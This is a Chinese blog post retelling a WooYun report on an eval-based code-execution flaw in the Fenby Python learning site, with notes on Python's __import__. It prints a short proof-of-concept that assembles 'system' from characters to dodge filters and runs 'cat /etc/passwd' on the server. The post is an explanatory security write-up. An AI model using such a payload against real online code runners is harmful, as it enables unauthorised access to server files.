有意思的python***案例
发布时间:2019-09-23 17:08:03编辑:auto阅读(1681)
今天在wooyun里看到一个有意思的漏洞。说它有意思,第一是思路很特别,当然也是因为安全做的很low,第二里面使用的python的poc有个小细节,特此分享一下。
网站叫Fenby网,主要是为了pythoner在线学习的,它有一个在线练习的功能,可以输入代码,然后执行,测试运行结果。。。
于是楼主就注册了一个账号,URL:http://www.fenby.com/course/units/xxxx
然后输入如下一段恶意代码:
import string
s = ["s","y","s","t","e","m"]
s = "".join(s)
cmd = "cat /etc/passwd"
code = "__import__('os')." + s + "('" + cmd + "')"
eval(code)于是就这样了。。。
这里我想说两点,第一造成漏洞的原因是没有过滤eval,第二代码里使用的import和__import__的不同。
import其实是调用的__import__但是如果直接写成 code = "__import__('package.module')",它的意思就不是说:import package.module as package
When the name variable is of the form package.module, normally, the top-level package (the name up till the first dot) is returned, not the module named by name.
上一篇: python日期和时间
下一篇: ext3文件恢复
- openvpn linux客户端使用
47793
- H3C基本命令大全
46325
- openvpn windows客户端使用
37206
- H3C IRF原理及 配置
34688
- Python exit()函数
29279
- openvpn mac客户端使用
25937
- python全系列官方中文文档
24830
- 1.常用turtle功能函数
19913
- python 获取网卡实时流量
19478
- python 获取Linux和Windows硬件信息
17971
- python3-scipy-ndimage平滑
5757°
- python3-scikit-image平滑去噪
6374°
- python3-PIL非线性噪声平滑
5886°
- python3-Scipy-ndimage进行盒核与高斯核平滑比较
5932°
- python3-PIL高斯模糊滤波器平滑
7033°
- python3-PIL基于盒模糊核均值化平滑
5873°
- python3-PIL线性噪声平滑
5897°
- python3-scikit-image直方图匹配
6403°
- python3-scikit-image对比拉伸和直方图均衡化
6357°
- python3-PIL二值化
7731°
- 姓名:Run
- 职业:谜
- 邮箱:383697894@qq.com
- 定位:上海 · 松江
